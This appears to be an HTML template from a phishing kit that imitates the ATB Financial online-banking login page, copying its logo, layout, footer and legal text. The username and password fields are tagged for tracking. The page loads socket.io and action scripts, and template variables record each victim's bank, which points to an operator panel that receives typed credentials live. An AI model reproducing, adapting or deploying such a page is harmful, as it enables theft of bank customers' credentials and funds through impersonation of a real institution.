<html class="fa-events-icons-ready">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <link rel="Shortcut Icon" href="favicon.ico" type="image/x-icon">
        <title>ATB Personal Banking</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="https://cloud.typography.com/6700732/6101192/css/fonts.css">
        <link href="https://use.fontawesome.com/f26ba7188d.css" media="all" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" rel="stylesheet">
        <link rel="stylesheet" href="/assets/atb/main.css?1">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
        <style>
        .bxljLY.warning {
            border-bottom: 2px solid #F1BE48;
            color: #63666A;
        }

        .bxljLY {
            padding: 0px 0px 20px 0px;
            text-align: center;
            margin-bottom: 10px;
        }
        </style>
    </head>
    <body>
        <div id="app">
            <div class="sc-kgoBCf bzQzYK" id="rbw-overall-context-wrapper">
                <div class="sc-iwsKbI jTTtAZ"></div>
                <div class="sc-jzJRlG eNoisr">
                    <form id="loginForm" class="sc-jTzLTM cUTnPT lab-form" id="rbw-login-block">
                        <input type="hidden" id="userAgent" name="userAgent">
                        <div class="sc-bdVaJa khUSez">
                            <img class="sc-htpNat gRCWAJ" src="/assets/atb/atb-jewel.svg" id="rbw-login-heading-atb-logo">
                            <div class="sc-EHOje ifxqtD" id="rbw-login-heading-contextHeader">
                                <div class="sc-bZQynM djdoFH">
                                    <div class="sc-dnqmqq fmWZCn">Personal</div>
                                </div>
                            </div>
                        </div>
                        <div class="sc-fjdhpX Pbrfi div-main" id="rbw-login-form-login-block">
                            <div>
                                <span>
                                    <label id="rbw-login-form-input-username-validation-error-label" class="top input rebank-textfield">Username</label>
                                    <input id="rbw-login-form-input-username" class="rebank-textfield lrinput" attr-action="Filling Username" required name="username" placeholder="" type="text" value="" style="padding-left: 15px;">
                                    <span class="rbw-login-form-input-username-clear-field sc-hMqMXs kfWmrv" id="rbw-login-form-input-username-clear-field" data-masked="false" title="Clear" style="cursor: pointer; margin-right: 15px;">
                                        <svg xmlns="http://www.w3.org/2000/svg" width="17" height="17" viewBox="0 0 17 17">
                                            <g id="rbw-login-form-input-username-clear-field-icon" fill="none" fill-rule="evenodd">
                                                <path fill="#63666A" fill-opacity=".5" fill-rule="nonzero" d="M8.5 0C3.8 0 0 3.8 0 8.5S3.8 17 8.5 17 17 13.2 17 8.5 13.2 0 8.5 0z"></path>
                                                <path fill="#FFF" d="M10.946 4.722L8.5 7.168 6.054 4.722 4.722 6.054 7.168 8.5l-2.446 2.446 1.332 1.332L8.5 9.832l2.446 2.446 1.332-1.332L9.832 8.5l2.446-2.446z"></path>
                                            </g>
                                        </svg>
                                    </span>
                                </span>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                <span>
                                    <label id="rbw-login-form-input-password-validation-error-label" class="top input rebank-textfield">Password</label>
                                    <input id="rbw-login-form-input-password" class="rebank-textfield lrinput" attr-action="Filling Password" required name="password"  placeholder="" type="password" value="" style="padding-left: 15px;">
                                    <span class="rbw-login-form-input-password-clear-field sc-hMqMXs kfWmrv" id="rbw-login-form-input-password-clear-field" data-masked="true" title="Clear" style="cursor: pointer; margin-right: 50px;">
                                        <svg xmlns="http://www.w3.org/2000/svg" width="17" height="17" viewBox="0 0 17 17">
                                            <g id="rbw-login-form-input-password-clear-field-icon" fill="none" fill-rule="evenodd">
                                                <path fill="#63666A" fill-opacity=".5" fill-rule="nonzero" d="M8.5 0C3.8 0 0 3.8 0 8.5S3.8 17 8.5 17 17 13.2 17 8.5 13.2 0 8.5 0z"></path>
                                                <path fill="#FFF" d="M10.946 4.722L8.5 7.168 6.054 4.722 4.722 6.054 7.168 8.5l-2.446 2.446 1.332 1.332L8.5 9.832l2.446 2.446 1.332-1.332L9.832 8.5l2.446-2.446z"></path>
                                            </g>
                                        </svg>
                                    </span>
                                    <div class="sc-eNQAEJ fFPsgR" id="mask-toggle" data-masked="true" style="cursor: pointer; margin-right: 10px;">
                                        <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 30 23">
                                            <title>Group 7 Copy</title>
                                            <desc>Created with Sketch.</desc>
                                            <g id="login">
                                                <text x="0" y="22" font-family="Open Sans" fill="#005eb8" font-size="10">Show</text>
                                            </g>
                                        </svg>
                                    </div>
                                </span>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="uiNewButtonWrapper "><input class="rebank-button primary" type="nano" id="rbw-login-form-button-submit" onclick="submitForm()" value="Log in"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                <button class="sc-dxgOiQ cgwvbs" id="rbw-login-form-button-forgotPassword">Forgot password</button>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                <button class="sc-dxgOiQ cgwvbs" id="rbw-login-form-button-forgotUsername">Forgot username</button>
                            </div>
                        </div>
                        <div class="sc-bwzfXH jWVvQp div-main" id="rbw-footer-footer-style">
                            <span id="rbw-footer-footer-login">
                                <a href="https://www.atb.com" target="_blank">atb.com</a> | <a href="https://www.atb.com/contact-us/Pages/default.aspx" target="_blank">Contact us | </a> <a href="https://www.atb.com/company/privacy-and-security/online-guarantee" target="_blank">Terms</a> | <a href="https://www.atb.com/important-information/privacy-security/Pages/Privacy-and-Security-Tips.aspx?utm_source=atbol&amp;utm_medium=login&amp;utm_campaign=security-commitment-security-tips" target="_blank">Security tips</a>
                                <div class="sc-VigVT jQbsgO"></div>
                                <div class="sc-VigVT jQbsgO"></div>
                                © ATB Financial 2022. All Rights Reserved.
                                <div class="sc-VigVT jQbsgO"></div>
                                Authorized access only. Usage may be monitored.
                            </span>
                        </div>
                        <div class="sc-fjdhpX Pbrfi div-loader" style="display: none">
                            <style>
                            .loader-div {
                                text-align: center;
                                padding-top: 20px;
                            }

                            .loader-div h2 {
                                font-size: 28px;
                                margin-bottom: 40px;
                            }
                            </style>
                            <div class="_1AR6e5iqu8uXHMTFKLnqWr loader-div">
                                <h2 class="heading--title2 ng-binding">Processing</h2>
                                <img src="/assets/atb/loading.gif" width="80">
                            </div>
                        </div>
                    </form>
                </div>
                <div class="sc-kAzzGY cUrlcM">
                    <div class="sc-chPdSV emnlIF" id="rbw-marquee-block">
                        <div class="sc-ckVGcZ czSiSX"></div>
                    </div>
                </div>
            </div>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Login</span>
    </body>
    <script src="/bank/atb/js/script.js">
    </script>
</html>
